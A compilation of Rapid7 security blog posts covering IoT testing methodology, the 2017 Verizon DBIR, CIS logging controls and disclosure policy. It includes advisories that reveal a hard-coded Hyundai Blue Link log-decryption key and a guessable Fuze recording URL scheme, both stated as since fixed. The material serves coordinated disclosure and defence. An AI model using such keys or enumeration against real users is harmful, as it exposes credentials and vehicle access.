Skip navigation
All Places > Information Security > Blog

By

Deral Heiland IoT - IoT Research Lead Rapid7

Nathan Sevier - Senior Consultant Rapid7

Chris Littlebury  - Threat Assessment Manage Rapid7

 

End-to-end ecosystem methodology

When examining IoT technology, the actionable testing focus and methodology is often applied solely to the embedded device. This is short sighted and incomplete. An effective assessment methodology should consider the entire IoT solution or as we refer to it, the IoT Product Ecosystem. Every interactive component that makes the product function is included in this IoT Product Ecosystem.

  • Embedded device and associated sensors receivers and actuators
  • Mobile application and or command and control software
  • Cloud API and or associated web services
  • Network communication protocols:
    • Ethernet
    • 802.11 Wifi
    • Intra-component communication such as Zigbee, Z-Wave, Bluetooth, etc.

 

ecosystem.png

Figure 1: Product IoT Ecosystem

 

Rapid7’s motivations behind examining the entire ecosystem is to ensure all components of the technology are secure. Failure of any component of the product ecosystem can and will affect the overall security posture. As an example, a failure in the cloud API security can easily lead to unauthorized access control of the embedded hardware, allowing a malicious actor to carry out attacks that could potentially impact the safety and security of the product user.

 

In the following sections we discuss the various areas and processes that should be a focus to ensure a thorough assessment of an IoT product ecosystems is conducted.

 

Functional evaluation

When conducting a test on an IoT product's ecosystem, first and foremost an IoT product should be set up and configured within normal specifications. We generally prefer to set up two separate environments, which will better facilitate vulnerability testing, such a cross account and cross system attack and can also be used to make comparisons between normal and altered configurations. Leveraging a fully functional environment, we can then more effectively map out all functions, features, components and communication paths within the products ecosystem. Using this data we can next build out a test plan, which covers the products ecosystem from end-to-end.

 

Device reconnaissance

We start each IoT security assessment by conducting reconnaissance and open source intelligence gathering (OSINT) to enumerate information about the components and supporting infrastructure. This enumeration can include, researching the make and model of the components and software used by the device, and identification of any external presence that makes up the cloud component of the product.

 

Cloud focused testing

IoT technology uses various web services for remote control, data collection, and product management. Often web services and cloud API can be the weakest link within an IoT product ecosystem. To validate the security, we conduct a very comprehensive assessment of the associated cloud services using functions and communication between the cloud services and all components in the product ecosystem. This allows us to validate the overall security posture of the product and determine impact and risk caused by security issues between components of the ecosystem. This also includes focused testing of the OWASP Top 10.

 

Mobile application/control system-focused testing

Generally IoT technologies commonly leverage various forms of remote control services such as mobile application (android, iOS) to remotely manage and control IoT technology. During this phase of testing we conduct in-depth testing and analysis of the mobile and remote application used to manage the IoT product. Again similar to the cloud testing, Rapid7 tests all functions and communications between the mobile applications and all components in the product ecosystem to validate the overall security posture of the product. This testing also focuses around the OWASP mobile top 10 to assure the application meets all security best practices.

 

Network-focused testing

IoT technologies commonly expose services via standard network communication paths such as ethernet and wifi, which can create an elevated level risk. During this phase of testing, we will identify all exposed TCP and UDP ports within the IoT ecosystems infrastructure. With this list of ports we can then conduct a thorough penetration test to identify all vulnerable or misconfigured services, which can be leveraged to compromise the system and or gain access to critical information.

 

Physical inspection

We also perform a physical inspection to assess the physical attack surface of an IoT device. This inspection includes examining the device for JTAG and Serial pin-outs, as well as identifying the pins used for power, data, and control of individual components. Each device will have different components or elements but some common attack vectors include:

  • Exterior USB Access
  • Exterior port access
  • Location and medium of storage
  • Availability of debug console access
  • Availability of serial console access
  • Efforts required for disassembly of the device
  • Risk to compromise based on brief physical access to the device
  • Risk to compromise based on extended physical access to the device
  • Risk to compromise based on allowed connectivity medium (Wireless, Wired, Bluetooth, etc.)

 

Physical device attacks

Physical inspection of the device is key to identifying the most logical physical attacks. After inspection, we conduct physical tests against the IoT device. Though these attack vectors may differ, they often follow common themes. Often, this testing will resemble the following actions:

  • Compromise through available ports.
  • Circumvention of device protections such as boot loader restrictions or restricted bios.
  • Access to modify the configuration of the device.
  • Access to storage to pull configuration keys used by the cloud component.
  • Access to firmware that would otherwise be restricted.
  • Access to the console or logs to isolate traffic destinations during communication with the cloud component.

 

Radio-focused testing

Most IoT devices also use radio based communication (RF) methods. We focus our communication testing methods to identify security issues to help determine risk and impact. To accomplish this we conduct specialized testing and analyses of the radio-based communication to identify if the communication:

  • Conforms to expected encryption techniques.
  • The component pairing processes cannot be subverted.
  • Allows unauthorized access or control.
  • Can be easily used to map out the underlying command and control traffic
  • Is vulnerable to replay attacks.

 

Need help securing your IoT devices? Check out our IoT Security Testing Services to learn more.

How many times have you witnessed security problems caused by a user making bad decisions? I'd venture to guess at least a few dozen if not hundreds. We've all seen where the perfect storm forms through weaknesses in technical controls, user training, and – most often – common sense and the outcome is not good. Best case it's ransomware or a similar malware infection. Beyond that, the sky is the limit. Before your organization suffers a breach and is having to answer to the news media and lawyers, there's one thing that you have to do: keep your users out of the security decision-making process.

Those of us working in IT and security are not in the business of making people feel good about their jobs. Rather, it's our duty to make sure that everyone is set up for success in day-to-day business processes. Every time you have a user faced with a security decision such as whether or not to click a link, setting a weak or a strong password, or updating software on their computers, you give away your power and put it in the hands of your users – where it does not belong. I understand that it's difficult to manage a network environment especially when you feel like users are working against your efforts every day. If anything, that should give you that much more of a reason to keep them from making security decisions in the first place.

I don't think it's insensitive or demeaning to keep people from having to make security decisions. They're not security experts. I know, your annual user awareness training session and security policies are supposed to cover all of that, but reality usually tells a different story. Like it or not, people make bad decisions and you have to do what it takes to keep them from doing so. In many cases, you can do this with technology. For example, in the case of passwords, if people are provided with the option to select a weak password, they will – most of the time. Ditto for backing up their data, updating their software, opening attachments, and so on. Throughout the history of humans, we have seen that people will, by and large, take the path of least resistance. What’s easiest and what's going to get them what they need sooner as opposed to later. Instant gratification is the name of the game.

Start thinking about how you can set your users, your business, and especially yourself up for success by taking users out of the security equation. Look at your business workflows. Look at your user on-boarding process. Look at your challenges with shadow IT, BYOD, and the like. It's everywhere across your organization. Some things are obvious. Others not so much. But if you look long enough and hard enough you'll find the areas where you need to control things using technologies, process adjustments, or just eliminating the situation altogether. If you continue to ignore this security challenge, your users will continue to make bad security choices, period. That's not what you want. Be proactive. Take charge. I strongly believe that if you spend enough time and effort in this one area of security, you'll can make huge strides towards minimizing your IT-related business risks.

Since its inception, Rapid7's Project Sonar has aimed to share the data and knowledge we've gained from our Internet scanning and collection activities with the larger information security community.  Over the years this has resulted in vulnerability disclosures, research papers, conference presentations, community collaboration and data.  Lots and lots of data.

 

Thanks to our friends at scans.io, Censys, and the University of Michigan, we've been able to provide the general public free access to much of our data, including:

 

 

As project Sonar continues, we will continue to publish our data through the outlets listed above, perhaps in addition to others.

 

Are you interested in Project Sonar?  Are you using this data?  If so, how?  Interested in seeing additional studies performed?  Have questions about the existing studies or how to use or interpret the data?  We love hearing from the community!  Post a comment below or reach out to us at research [at] rapid7 [dot] com.

The much-anticipated, tenth-anniversary edition of the Verizon DBIR has been released (http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/), once again providing a data-driven snapshot into what topped the cybercrime charts in 2016. There are just under seventy-five information-rich pages to go through, with topics ranging from distributed denial-of-service (DDoS) to ransomware, prompting us to spin a reprise edition of last year’s DBIR field guide (https://community.rapid7.com/community/infosec/blog/2016/04/29/the-2016-verizon- data-breach-investigations-report-the-defenders-perspective).

 

Before we bust out this year’s breach-ography, let’s set a bit of context.

 

The Verizon DBIR is digested by a diverse community, but the lessons found within are generally aimed at defenders in organizations who are faced with the unenviable task of detecting and deterring the daily onslaught of attacks and attackers. This post is also aimed at that audience. As you go through the Verizon DBIR, there should be three guiding principles at work:

 

 

Time to fire up the jukebox and see what’s inside.

 

The Detection-Deficit is Dead…Long Live the Defender’s Differential!

 

The first chart I always went to in the DBIR was the Detection-Deficit chart. Said chart “compared the percentage of breaches where the time-to-compromise was days or less against the percentage of breaches where the time- to-discovery was days or less.” (VZDBIR, pg 8). It’s also no longer an artifact in the Verizon DBIR.

 

The Verizon Security Research team provided many good reasons for not including the chart in the report, and also noted several caveats about the timings that you should take time to consider. But, you still need to be tracking similar metrics in your own organization to see if things are getting better or worse (things rarely hold steady in infosec land).  We’ve taken a cue from the DBIR and used their data to give you two new metrics to track: the “Exfiltration-Compromise Differential”

Verizon DBIR Summary: Exfiltration Chart

and the “Containment-Discovery Differential”.

Verizon DBIR Summary: Containment Chart

The former chart shows a band created by comparing the percentage of breaches where exfiltration (you can substitute or add-in other accomplished attacker goals) was in “days or less” (in other words, less than seven days) to those when initial compromise was “days or less”. This band should be empty (all attacker events took days or longer) or as tiny as possible.

 

The latter does the same to compare the defender’s ability to detect and contain attacker activity. That band needs to be as YUGE as you can make it (aligned to your organization’s risk and defense spending appetites).

 

As noted in the Verizon DBIR, things aren’t getting much better (or worse) when looked at in aggregate, but I’m hopeful that organizations can make progress in these areas as tools, education, techniques and processes continue to improve.

 

Some other key takeaways in the “Breach Trends” section include:

 

  • The balance between External and Internal actors has ebbed-and flowed at about the same pace for the past 7 years, meaning Figure 2 does not validate the ever-present crusade by your Internal Audit department to focus solely on defending against rogue sysadmins. There is a cautionary tale here, though, in that many of the attacks marked as “internal” were actually committed by external attackers who used legit credentials to impersonate internal users.
  • We have finally reached the Threat Action Trifecta stage with Social, Malware and Hacking reigning supreme (and will likely do so for some time to come).
  • Financial gain and stealing secrets remain primary motives (and defending against those who seek your secrets may become job #1 over the coming years if Figure 3 continues the trend).

 

Team DBIR also provided a handy punch-card for you in Figure 9:

 

Verizon Data Breach Investigation Report Summary: Figure 9

It’s your “at-a-glance” key to the 2016 chart-toppers by industry. Keep it handy as you sit in your post-DBIR-launch roadmap adjustment meetings (you do have those, right?).

 

The Secret Life of Enterprise Vulnerability Management (Guest starring IoT)

 

Verizon has many partners who provide scads of vulnerability data, and the team took a very interesting look at  patching in the intro section preceding the individual industry dives.

Verizon DBIR Summary: Figure 14

Verizon gives a solid, technical explanation of this chart, so we’ll focus on how you should benchmark your own org against it.

 

Find your industry (NAICS codes are here: https://www.census.gov/eos/www/naics/ but you can also Google™ “COMPANY_NAME NAICS” and usually get a quick result) on the right then hit up your vulnerability and patch management dashboards to see if you meet or beat expectations. If you’re a college, do you patch more than 12% of vulns in 12 weeks-time? If you’re in a hospital, do you meet the 77% bar?

 

The chart is based on real data from many organizations. You may have some cognitive dissonance reading it because we constantly hear how awesome, well-resourced financial institutions are at IT & security and the converse for industries such as Healthcare. One way to validate these findings is to start tracking this data internally, then getting your ISAC partners (you are aligned with one — or more — information sharing and analysis centers, right?) to do the same and compare notes a few times a year. You also need to define your own targets and use your hit/miss ratio as a catalyst for process improvement (or funding for better tooling).

 

But wait…there’s more!

 

Verizon DBIR Summary: Figure 56Keep one finger on page 13 and then flip to Appendix B to get even more information on vulnerability management, including this chart >

 

Network ops folks patching on 90-day cycles shouldn’t really surprise folks - we need to keep those bits and bytes flowing and error-free high-availability switchover capability is expensive - but take a look at the yellow-ish line. First, do you even track IoT (Internet of Things, i.e. embedded) patching? And, if you do — or, when you start to after reading this — will you strive to do better than the “take 100 days to not even get half the known vulns patched”?

 

IoT is a blind-spot in many (most) organizations and this chart is a great reminder that you need to:

 

  • care about
  • inventory/locate, and
  • track

 

IoT in your environment.

 

Industrial Development

 

Unfortunately, digesting the various Industry sections of the Data Breach Investigations Report is an exercise that you must — dear, reader — undertake on your own, but they are a good resource to have for planning or security architecture development session.

 

Find your industry (see the previous section in this post), note the breach frequency (they’ll likely have fixed the bug in the Accommodation section by the time our blog post drops), top patterns, actor information and compromise targets and compare your 2016 to the overall industry 2016. Note the differences (or similarities) and adjust accordingly.

 

The DBIR team provides unique details and content in each industry section to help you focus on the differentials (the unique incident characteristics that made one industry different from each other). As you go through each, do not skip over the caveats. The authors of the report spend a great deal of time sifting through details and will often close out a section with important information that may change your perspective on a given area, such as this closing caveat in the Retail section: “This year we do not have any large retailers in the Point of Sale Intrusions pattern, which is hopefully an indicator of improvements and lessons learned. We are interested in finding out if smaller retailers also learned this lesson, or if single small breaches just aren’t making it into our dataset.”

 

The Last Waltz: Dancing Through Incident Classification Patterns

 

We’ll close with an overview of the bread-and-butter (or, perhaps, avocado toast?) of the DBIR: the incident classification patterns. Figures 33 & 34 provides the necessary contextual overview:

Verizon DBIR Summary: Figure 33 Breaches hurt, but incidents happen with more regularity, so you need to plan for both. First, compare overall prevalence for each category to what your own org saw in 2016 so you understand your own, unique view.

 

Next, make these sections actionable. One of the best ways to get the most out of the data in each of the Patterns sections is to take one or two key details from each that matter to your industry (they align the top ones in each category) and design either tabletop or actual red-team exercise scenarios that your org can run through.

 

For example, design a scenario where attackers have obtained a recent credential dump and have targeted your employee HR records (yes, I took the easy one from Figure 52, page 58).  MITRE has a decent “Cyber Exercise Playbook” (https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise -playbook.pdf) you can riff off of if you don’t have one of your own to start with.

 

Coda

 

This is the first year Rapid7 has been a part of the DBIR corpus and we want to end with a shout-out to the entire DBIR team for taking the time to walk through our incident/breach-data contributions with us and look forward to contributing more —and more diverse — data in reports to come.

This post describes a security vulnerability in the Fuze collaboration platform, and the mitigation steps that have been taken to correct the issue. The Fuze collaboration platform did not require authentication to access meeting recordings (CWE-284). Shortly after being informed of this issue, Fuze disabled public access to all recorded meetings, and implemented user-configurable controls in the client application to mediate public access to shared meeting recordings. Affected recordings that had already been shared were reviewed and addressed as well. Rapid7 thanks Fuze for their timely and thoughtful response to this issue.

Product Description

Fuze is an enterprise, multi-platform voice, messaging, and collaboration service created by Fuze, Inc. It is described fully at the vendor's website. While much of the Fuze suite of applications are delivered as web-based SaaS components, there are endpoint client applications for a variety of desktop and mobile platforms.

Credit

This issue was discovered by Samuel Huckins of Rapid7 (that's me ), and is being disclosed in accordance with Rapid7's vulnerability disclosure policy.

Exploitation

Recorded Fuze meetings are saved to Fuze's cloud hosting service. They could be accessed by URLs such as "https://browser.fuzemeeting.com/?replayId=7DIGITNUM", where "7DIGITNUM" is a seven digit number that increments over time. Since this identifier did not provide sufficient keyspace to resist bruteforcing, specific meetings could be accessed and downloaded by simply guessing a replay ID reasonably close to the target, and iterating through all likely seven digit numbers. This format and lack of authentication also allowed one to find recordings via search engines such as Google.

Vendor Statement

Security is a top priority for Fuze and we appreciate Rapid7 identifying this issue and bringing it to our attention. When we were informed by the Rapid7 team of the issue, we took immediate action and have resolved the problem.

Remediation

As of Mar 1, 2017, all meeting recordings now appear to require password authentication in order to be viewed from Fuze's cloud-hosted web application via direct browsing or from the Fuze desktop and mobile clients. This authentication control is configurable by the user via the client applications as of version 4.3.1 (released on Mar 10, 2017). Fuze users are encouraged to update their Fuze client applications in order to take advantage of new access controls. Additional options, such as downloading the recording locally, are available at https://account.fuzemeeting.com/#/recordings.

Disclosure Timeline

  • Thu, Feb 23, 2017: Discovered by Samuel Huckins of Rapid7.

  • Mon, Feb 27, 2017: Vulnerability verified by Rapid7.

  • Mon, Feb 27, 2017: Vulnerability details disclosed to Fuze.

  • Wed, Mar 01, 2017: Fuze disabled public access to meeting recordings.

  • Fri, Mar 10, 2017: Version 4.3.1 of Fuze endpoint client released, providing authentication controls for recorded meetings.

  • Tue, Mar 15, 2017: Vulnerability details disclosed to CERT/CC.

  • Tue, Mar 21, 2017: VU#590023 assigned by CERT/CC to track this issue.

  • Tue, Apr 25, 2017: CERT/CC and Rapid7 decided not to issue a CVE for this vulnerability. The issue was primarily on Fuze's servers, thus the end user didn't have to take any actions, and the issue has already been corrected.

  • Tue, May 02, 2017: Disclosed to the public

Summary

Due to a reliance on cleartext communications and the use of a hard-coded decryption password, two outdated versions of Hyundai Blue Link application software, 3.9.4 and 3.9.5 potentially expose sensitive information about registered users and their vehicles, including application usernames, passwords, and PINs via a log transmission feature. This feature was introduced in version 3.9.4 on December 8, 2016, and removed by Hyundai on March 6, 2017 with the release of version 3.9.6.

Affected versions of Hyundai Blue Link mobile application upload application logs to a static IP address over HTTP on port 8080. The log is encrypted using a symmetrical key, "1986l12Ov09e", which is defined in the Blue Link application (specifically, C1951e.java), and cannot be modified by the user.

Once decoded, the logs contain personal information, including the user's username, password, PIN, and historical GPS data about the vehicle's location. This information can be used to remotely locate, unlock and start the associated vehicle.

This vulnerability was discovered by Will Hatzer and Arjun Kumar, and this advisory was prepared in accordance with Rapid7's disclosure policy.

Product Description

The Blue Link app is compatible with 2012 and newer Hyundai vehicles. The functionality includes remote start, location services, unlocking and locking associated automobiles, and other features, documented at the vendor's web site.

Credit

This vulnerability was discovered by independent researchers William Hatzer and Arjun Kumar.

Exploitation for R7-2017-02

The potential data exposure can be exploited one user at a time via passive listening on insecure WiFi, or by standard man-in-the-middle (MitM) attack methods to trick a user into connecting to a WiFi network controlled by an attacker on the same network as the user. If this is achieved, an attacker would then watch for HTTP traffic directed at an HTTP site at 54.xx.yy.113:8080/LogManager/LogServlet, which includes the encrypted log file with a filename that includes the user's email address.

It would be difficult to impossible to conduct this attack at scale, since an attacker would typically need to first subvert physically local networks, or gain a privileged position on the network path from the app user to the vendor's service instance.

Vendor Statement

Hyundai Motor America (HMA) was made aware of a vulnerability in the Hyundai Blue Link mobile application by researchers at Rapid7. Upon learning of this vulnerability, HMA launched an investigation to validate the research and took immediate steps to further secure the application. HMA is not aware of any customers being impacted by this potential vulnerability.

 

The privacy and security of our customers is of the utmost importance to HMA. HMA continuously seeks to improve its mobile application and system security. As a member of the Automotive Information Sharing Analysis Center (Auto-ISAC), HMA values security information sharing and thanks Rapid7 for its report.

Remediation

On March 6, 2017, the vendor updated the Hyundai Blue Link app to version 3.9.6, which removes the LogManager log transmission feature. In addition, the TCP service at 54.xx.yy.113:8000 has been disabled. The mandatory update to version 3.9.6 is available in both the standard Android and Apple app stores.

Disclosure Timeline

  • Tue, Feb 02, 2017: Details disclosed to Rapid7 by the discoverer.
  • Sun, Feb 19, 2017: Details clarified with the discoverer by Rapid7.
  • Tue, Feb 21, 2017: Rapid7 attempted contact with the vendor.
  • Sun, Feb 26, 2017: Vendor updated to v3.9.5, changing LogManager IP and port.
  • Mon, Mar 02, 2017: Vendor provided a case number, Consumer Affairs Case #10023339
  • Mon, Mar 06, 2017: Vendor responded, details discussed.
  • Mon, Mar 06, 2017: Version 3.9.6 released to the Google Play store.
  • Wed, Mar 08, 2017: Version 3.9.6 released to the Apple App Store.
  • Wed, Mar 08, 2017: Details disclosed to CERT/CC by Rapid7, VU#152264 assigned.
  • Wed, Apr 12, 2017: Details disclosed to ICS-CERT by Rapid7, ICS-VU-805812 assigned.
  • Fri, Apr 21, 2017: Details validated with ICS-CERT and HMA, CVE-2017-6052 and CVE-2017-6054 assigned.
  • Tue, Apr 25, 2017: Public disclosure of R7-2017-02 by Rapid7.
  • Tue, Apr 25, 2017: ICSA-17-115-03 published by ICS-CERT.
  • Fri, Apr 28, 2017: Redacted the now-disabled IP address for the LogManager IP address.

In your organizational environment, Audit Logs are your best friend. Seriously. This is the sixth blog of the series based on the CIS Critical Security Controls. I’ll be taking you through Control 6: Maintenance, Monitoring and Analysis of Audit Logs, in helping you to understand the need to nurture this friendship and how it can bring your information security program to a higher level of maturity while helping gain visibility into the deep dark workings of your environment.

 

In the case of a security event or incident, real or perceived, and whether it takes place due to one of the NIST-defined incident threat vectors, or falls into the “Other” category, having the data available to investigate and effectively respond to anomalous activity in your environment, is not only beneficial, but necessary.

 

What this Control Covers:

This control has six sections which cover everything from NTP configuration, to verbose logging of traffic from network devices to how the organization can best leverage a SIEM for a consolidated view and action points, and how often reports need to be reviewed for anomalies.

radar.jpg

 

There are many areas where this control runs alongside or directly connects to some of the other controls as discussed in other CIS Critical Control Blog posts.

 

How to Implement It:

Initial implementation of the different aspects of this control range in complexity from a “quick win” to full configuration of log collection, maintenance, alerting and monitoring.

 

Network Time Protocol: Here’s your quick win. By ensuring that all hosts on your network are using the same time source, event correlation can be accomplished in a much more streamlined fashion. We recommend leveraging the various NTP pools that are available, such as those offered from pool.ntp.org. Having your systems check in to a single regionally available server on your network, which has obtained its time from the NTP pool will save you hours of chasing down information.

 

Reviewing and Alerting: As you can imagine, there is a potential for a huge amount of data to be sent over to your SIEM for analysis and alerting. Knowing what information to capture and retain is a huge part of the initial and ongoing configuration of the SIEM.

 

Fine tuning of alerts is a challenge for a lot of organizations. What is a critical alert? Who should be receiving these and how should they be alerted? What qualifies as a potential security event? SIEM manufacturers and Managed Service Providers have their pre-defined criteria, and for the most part, are able to effectively define clear use cases for what should be alerted upon, however your organization may have additional needs. Whether these needs are the result of compliance requirements or you needing to keep an eye on a specific critical system for anomalous activity, defining your use cases and ensuring that alerts are sent for the appropriate level of concern as well as having them sent to the appropriate resources is key in avoiding alert fatigue.

calendar.jpg

Events that may not require immediate notification still have to be reviewed. Most regulatory requirements state that logs should be reviewed "regularly" but remain vague on what this means. A good rule of thumb is to have logs reviewed on a weekly basis, at a minimum. While your SIEM may have the analytical capabilities to draw correlations, there will undoubtedly be items that you find that will require action.

 

What should I be collecting?

There is a lot of technology out there to “help” secure your environment. Everything from Active Directory auditing tools, which allow you to pull nicely formatted and predefined reports, to the network configuration management tools. There are all flavors out there that are doing the same thing that your SIEM tool can do with appropriately managed alerting and reporting. It should be able to be a one stop shop for your log data.

In a perfect world, where storage isn’t an issue, each of the following items would have security related logs sent to the SIEM.

  • Network gear
    • Switches
    • Routers
    • Firewalls
    • Wireless Controllers and their APs.
  • 3rd Party Security support platforms
    • Web proxy and filtration
    • Anti-malware solutions
    • Endpoint Security platforms (HBSS, EMET)
    • Identity Management solutions
    • IDS/IPS
  • Servers
    • Special emphasis on any system that maintains an identity store, including all Domain Controllers in a Windows environment.
    • Application servers
    • Database servers
    • Web Servers
    • File Servers – Yes, even in the age of cloud storage, file servers are still a thing, and access (allowed or denied) needs to be logged and managed.
  • Workstations
    • All security log files

 

This list is by no means exhaustive, and even at the level noted we are talking about large volumes of information. This information needs a home. This home needs to be equipped with adequate storage and alerting capabilities.

 

Local storage is an alternative, but it will not provide the correlation, alerting or retention capabilities as a full blown SIEM implementation.

 

There has been some great work done in helping organizations refine what information to include in log collections. Here are a few resources I have used.

 

SANS - https://www.sans.org/reading-room/whitepapers/auditing/successful-siem-log-manag ement-strategies-audit-compliance-33528

 

NIST SP 800-92 - http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-92.pdf

 

Malware Archeology - https://www.malwarearchaeology.com/cheat-sheets/

 

 

Read more on the CIS Critical Security Controls:

 

What are the CIS Critical Security Controls?

 

The Center for Internet Security (CIS) Top 20 Critical Security Controls (previously known as the SANS Top 20 Critical Security Controls), is an industry-leading way to answer your key security question: “How can I be prepared to stop known attacks?” The controls transform best-in-class threat data into prioritized and actionable ways to protect your organization from today’s most common attack patterns.

 

Achievable Implementation of the CIS Critical Security Controls

 

The interesting thing about the critical security controls is how well they scale to work for organizations of any size, from very small to very large. They are written in easy to understand business language, so non-security people can easily grasp what they do. They cover many parts of an organization, including people, processes and technology. As a subset of the priority 1 items in the NIST 800-53 special publication, they are also highly relevant and complimentary to many established frameworks.

 

Leveraging Rapid7's expertise to assist your successful implementation

 

As part of a Rapid7 managed services unit, the Security Advisory Services team at Rapid7 specializes in security assessments for organizations. Using the CIS Critical Security Controls (formerly the SANS 20 Critical Controls) as a baseline, the team assesses and evaluates strengths and gaps, and makes recommendations on closing those gaps.

 

The Security Advisory Services team will be posting a blog series on each of the controls. These posts are based on our experience over the last two years of our assessment activity with the controls, and how we feel each control can be approached, implemented and evaluated. If you are interested in learning more about the CIS Critical Controls, stay tuned here as we roll out posts weekly. Thanks for your interest and we look forward to sharing our knowledge with you!

 

The definitive guide of all CIS Critical Security Controls

As the blog series expands, we’ll use this space to keep a running total of all the 20 CIS Critical Controls. Check back here to stay updated on each control.

 

Control 1: Inventory of Authorized and Unauthorized Devices

This control is split into 6 focused sections relating to network access control, automation and asset management. The control specifically addresses the need for awareness of what’s connected to your network, as well as the need for proper internal inventory management and management automation. Implementing inventory control is probably the least glamorous way to improve a security program, but if it's done right it reduces insider threat and loss risks, cleans up the IT environment and improves the other 19 controls. Learn more.

 

Control 2: Inventory of Authorized and Unauthorized Software

The second control is split into 4 sections, each dealing with a different aspect of software management. Much like Control 1, this control addresses the need for awareness of what’s running on your systems and network, as well as the need for proper internal inventory management. The CIS placed these controls as the "top 2" in much the same way that the NIST Cybersecurity Framework addresses them as "priority 1" controls on the 800-53 framework; inventory and endpoint-level network awareness is critical to decent incident response, protection and defense. Learn more.

Control 3: Secure Configurations for Hardware & Software

This control deals with Secure Configurations for Hardware & Software. The Critical Controls are numbered in a specific way, following a logical path of building foundations while you gradually improve your security posture and reduce your exposure. Controls 1 and 2 are foundational to understanding what inventory you have. The next step, Control 3, is all about shrinking that attack surface by securing the inventory in your network. Learn more.

 

Control 4: Continuous Vulnerability Assessment & Remediation

Organizations operate in a constant stream of new security information: software updates, patches, security advisories, threat bulletins, etc. Understanding and managing vulnerabilities has become a continuous activity and requires a significant amount of time, attention and resources. Attackers have access to the same information, but have significantly more time on their hands. This can lead to them taking advantage of gaps between the appearance of new knowledge and remediation activities. Control 4 challenges you to understand why vulnerability management and remediation is important to your overall security maturity. Learn more.

 

Control 5: Controlled Use of Administrative Privilege

The ultimate goal of an information security program is to reduce risk. Often, hidden risks run amok in organizations that just aren’t thinking about risk in the right way. Control 5 of the CIS Critical Security Controls can be contentious, can cause bad feelings, and is sometimes hated by system administrators and users alike. It is, however, one of the controls that can have the largest impact on risk.  Discover how reducing or controlling administrative privilege and access can reduce the risk of an attacker comprising your sensitive information. Learn more.

 

Control 6: Maintenance, Monitoring and Analysis of Audit Logs

This control has six sections which cover everything from NTP configuration, to verbose logging of traffic from network devices to how the organization can best leverage a SIEM for a consolidated view and action points, and how often reports need to be reviewed for anomalies. Learn more.

 

Control 7: Email and Web Browser Protection

Critical Control 7 has eight sections that cover the basics of browser and email client safety, secure configuration and mail handling at the server level. The control pays specific attention to concepts like scripting and active component limiting in browsers and email clients, attachment handling, configuration, URL logging, filtering and whitelisting. The premise of the control is fairly straightforward: browser and email client security are critically important for low-level risk mitigation. Learn more.

 

Control 8: Malware Defenses

Control 8 covers malware and antivirus protection at system, network, and organizational levels. It isn’t limited to workstations, since even servers that don't run Windows are regularly targeted (and affected) by malware. Control 8 should be used to asses infrastructure, IoT, mobile devices, and anything else that can become a target for malicious software—not just endpoints. Learn more.

Rapid7 has long been a champion of coordinated vulnerability disclosure and handling processes as they play a critical role in both strengthening risk management practices and protecting security researchers. We not only use coordinated disclosure processes in our own vulnerability disclosure and receiving activities, but also advocate for broader adoption in industry and in government policies.

 

Building on this, we recently joined forces with other members of the security community to urge NIST and NTIA (both part of the U.S. Dept. of Commerce) to promote adoption of coordinated vulnerability disclosure processes. In each of these two most recent filings, Rapid7 was joined by a coalition of approximately two dozen (!!) like-minded cybersecurity firms, civil society organizations, and individual researchers.

 

  • Joint comments to the National Institute of Standards and Technology (NIST) Cybersecurity Framework, available here.

 

  • Joint comments to the National Telecommunications and Information Administration's (NTIA) "Green Paper" on the Internet of Things, available here.

 

The goal of the comments is for these agencies to incorporate coordinated vulnerability disclosure and handling processes into official policy positions on IoT security (in the case of NTIA) and cybersecurity guidance to other organizations (in the case of NIST). We hope this ultimately translates to broader adoption of these processes by both companies and government agencies.

 

What are "vuln disclosure processes" and why are they important?

Okay, first off, I really hope infosec vernacular evolves to come up with a better term than "coordinated vulnerability disclosure and handling processes" because boy that's a mouthful. But it appears to be the generally agreed-upon term.

 

A coordinated vulnerability disclosure and handling process is basically an organization's plan for dealing with security vulnerabilities disclosed from outside the organization. They are formal internal mechanisms for receiving, assessing, and mitigating security vulnerabilities submitted by external sources, such as independent researchers, and communicating the outcome to the vulnerability reporter and affected parties. These processes are easy to establish (relative to many other security measures) and may be tailored for an organizations' unique needs and resources. Coordinated vulnerability disclosure and handling processes are not necessarily "bug bounty programs" and may or may not offer incentives, or a guarantee of protection against liability, to vulnerability reporters.

 

Why are these processes important? The quantity, diversity, and complexity of vulnerabilities will prevent many organizations from detecting all vulnerabilities without independent expertise or manpower. When companies are contacted about vulnerabilities in their products or IT from unsolicited third parties, having a plan in place to get the information to the right people will lead to a quicker resolution. Security researchers disclosing vulnerabilities are also better protected when companies clarify a process for receiving, analyzing, and responding to the disclosures – being prepared helps avoid misunderstandings or fear that can lead to legal threats or conflicts.

 

To catch vulnerabilities they might otherwise overlook, businesses and government agencies are increasingly implementing vulnerability disclosure and handling processes, but widespread adoption is not yet the norm.

 

NIST Framework comments

The NIST Framework is a voluntary guidance document for organizations for managing cybersecurity risks. The Framework has seen growing adoption and recognition, and is an increasingly important resource that helps shape cybersecurity implementation in the public and private sectors. NIST proposed revisions to the Framework and solicited comments to the revisions.

 

In our joint comments, the coalition urged NIST to expressly incorporate vulnerability disclosure processes into the Framework. The Framework already included "external participation" components and metrics (likely directed at formal cyber threat intel sharing arrangements), but they are unclear and don't explicitly refer to vulnerability disclosure processes.

 

Specifically, our comments recommended that the Framework Core include a new subcategory dedicated to vulnerability disclosure processes, and to build the processes into existing subcategories on risk assessment and third party awareness. Our comments also recommended revising the "external participation" metric of the Framework Tiers to lay out a basic maturity model for vulnerability disclosure processes.

 

NTIA Internet of Things "Green Paper" comments

NTIA issued a “Green Paper” in late 2016 to detail its overall policies with regard to the Internet of Things, and then they solicited feedback and comments on that draft. Although the Dept. of Commerce has demonstrated its support for vulnerability disclosure and handling processes, there was little discussion about this issue in the Green Paper. The Green Paper is important because it will set the general policy agenda and priorities for the Dept. of Commerce on the Internet of Things (IoT).

 

In our joint comments, the coalition urged NTIA to include more comprehensive discussion vulnerability disclosure and handling processes for IoT. This will help clarify and emphasize the role of vulnerability disclosure in the Dept. of Commerce's policies on IoT security going forward.

 

The comments also urged NTIA to commit to actively encouraging IoT vendors to adopt vulnerability disclosure and handling processes. The Green Paper mentioned NTIA's ongoing "multistakeholder process" on vulnerability disclosure guidelines, which Rapid7 participates in, but the Green Paper did not discuss any upcoming plans for promoting adoption of vulnerability disclosure and handling processes. Our comments recommended that NTIA promote adoption among companies and government agencies in IoT-related sectors, as well as work to incorporate the processes into security guidance documents.

 

More coming

